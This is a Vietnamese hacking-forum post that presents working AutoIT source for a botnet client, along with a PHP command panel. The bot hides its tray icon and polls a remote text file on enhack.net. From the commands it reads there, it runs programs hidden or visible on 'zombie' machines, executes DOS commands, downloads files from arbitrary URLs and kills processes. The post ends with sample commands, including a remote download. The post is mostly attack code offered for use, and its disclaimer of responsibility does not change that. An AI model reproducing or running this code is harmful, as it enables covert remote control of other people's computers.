Viết botnet bằng AutoIT
Trang 1 trong tổng số 1 trang
Viết botnet bằng AutoIT
admin 8/5/2010, 10:31 am
Như đã nói, bot này Jutoms viết ra với mục đích để các bạn hiểu cấu trúc của một con bot như thế nào sau cái video sử dụng bot của LlyKil.
Đặc điểm:
1. Không tự động sửa đổi hệ thống
2. Không có tính lây lan như virus
3. Nhận lệnh từ file txt đặt trên site chỉ định (thay vì thông qua IRC)
4. Từ điều 3 => có thể cho/không cho một số zombie có thể nhận chỉ thị từ Master.
Tính năng:
1. Thực thi các ứng dụng trên máy zombie ở chế độ background (ẩn) hoặc forceground (hiện).
2. Chỉ thị từ Master được gõ như trong Windows Console (CMD)
3. Có khả năng download file từ URL chỉ định tư về nơi chỉ định trên đĩa cứng
4. Stop/Kill ứng dụng bằng tên.
Đây là mã nguồn bằng AutoIT3
Anh em có thể test rồi viết hộ mình hướng dẫn sử dụng cấu trúc lệnh và cơ chế của nó nhé !
Và cái này quan trọng nè :
Jutoms và EHS không chịu bất kì trách nhiệm nào nếu các bạn sử dụng mã nguồn bot trên với bất kì mục đích phá hoại nào.
Đây là mã nguồn file cmd.php để gõ command cho Bot
Một số lệnh mẫu (không phân biệt chữ hoa/thường)
Chú ý: sau khi gõ một lệnh và enter, chờ khoảng 10s sau bấm enter lần nữa để xóa lệnh, không thì bot cứ thế mà làm sẽ ì máy zombie
Mở Registry Editor chế độ hiện, nếu chạy ẩn thì bỏ #show
Bổ sung code mới, thông minh hơn con trên xíu (IMG:http://xforce.enhack.net/images/smilies/yahoo/1.gif)
Thiết kế cho việc dùng Cellfone có GPRS remote console nên tối giản mã lệnh và sẽ bổ sung những mã lệnh mới để thay thế những mã lệnh dài nếu cần thiết.
Đặc điểm:
1. Không tự động sửa đổi hệ thống
2. Không có tính lây lan như virus
3. Nhận lệnh từ file txt đặt trên site chỉ định (thay vì thông qua IRC)
4. Từ điều 3 => có thể cho/không cho một số zombie có thể nhận chỉ thị từ Master.
Tính năng:
1. Thực thi các ứng dụng trên máy zombie ở chế độ background (ẩn) hoặc forceground (hiện).
2. Chỉ thị từ Master được gõ như trong Windows Console (CMD)
3. Có khả năng download file từ URL chỉ định tư về nơi chỉ định trên đĩa cứng
4. Stop/Kill ứng dụng bằng tên.
Đây là mã nguồn bằng AutoIT3
Anh em có thể test rồi viết hộ mình hướng dẫn sử dụng cấu trúc lệnh và cơ chế của nó nhé !
- Code:
#NoTrayIcon
$txt = "http://enhack.net/direc.txt"
While (1)
GetDr()
ExCmd()
Sleep(3000)
WEnd
Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc
Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "#SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "LOAD#", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL#", 2) Then
$cmd = StringSplit($con, "#")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
EndIf
EndFunc
Và cái này quan trọng nè :
Jutoms và EHS không chịu bất kì trách nhiệm nào nếu các bạn sử dụng mã nguồn bot trên với bất kì mục đích phá hoại nào.
Đây là mã nguồn file cmd.php để gõ command cho Bot
- Code:
<html>
<head>
<title>EBoT Commander</title>
</head>
<body style='color:#00FF00; background-color: black'>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Command>
</form>
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>
Một số lệnh mẫu (không phân biệt chữ hoa/thường)
Chú ý: sau khi gõ một lệnh và enter, chờ khoảng 10s sau bấm enter lần nữa để xóa lệnh, không thì bot cứ thế mà làm sẽ ì máy zombie
Mở Registry Editor chế độ hiện, nếu chạy ẩn thì bỏ #show
- Code:
RUN#regedit #show
- Code:
KILL#YahooMessenger
- Code:
LOAD# hxxp://itprofes.com/avatar.png c:\avatar.png
Bổ sung code mới, thông minh hơn con trên xíu (IMG:http://xforce.enhack.net/images/smilies/yahoo/1.gif)
Thiết kế cho việc dùng Cellfone có GPRS remote console nên tối giản mã lệnh và sẽ bổ sung những mã lệnh mới để thay thế những mã lệnh dài nếu cần thiết.
- Code:
#include
#include
#NoTrayIcon
$txt = "http://enhack.net/direc.txt"
$key = ""
While (1)
$con = _INetGetSource($txt)
If $key <> $con Then
; Phan tich va thuc hien lenh
If StringInStr($con, "#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "@#", 2) Then
Run($cmd[2], "", @SW_HIDE)
Else
Run($cmd[2])
EndIf
ElseIf StringInStr($con, "$", 2) Then
$cmd = StringSplit($con, "$")
_RunDOS($cmd[2])
ElseIf StringInStr($con, "!", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
ElseIf StringInStr($con, "~", 2) Then
$cmd = StringSplit($con, "~")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
EndIf
$key = $con
EndIf
Sleep(5000)
WEnd
- Code:
RUN# lão rút con "#",
LOAD# rút còn "!"
KILL# rút còn "~"
và run lệnh DOS thì "$"
và "@#" để chạy nền vì mặc định "#" là show
admin- Thiếu Úy III
- Tổng số bài gửi : 627
Diem : 6547
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa -
Similar topics» Keymail the KeyLogger Viết bằng C
» Kết thúc series bài viết về ARP như sau
» Source Botnet AutoIT
» Để AutoIt không bị Bkav báo là virus
» Hướng dẫn viết một chương trình Sniffer
» Kết thúc series bài viết về ARP như sau
» Source Botnet AutoIT
» Để AutoIt không bị Bkav báo là virus
» Hướng dẫn viết một chương trình Sniffer
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
» xin tai lieu tieng viet
» Theo dõi tiến trình
» Giải pháp Bảo mật của Cisco
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Learn to hack !
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
» Ô Long Viên (Tập II)
» những ebook về hack tiếng việt cho người mới tìm hiểu.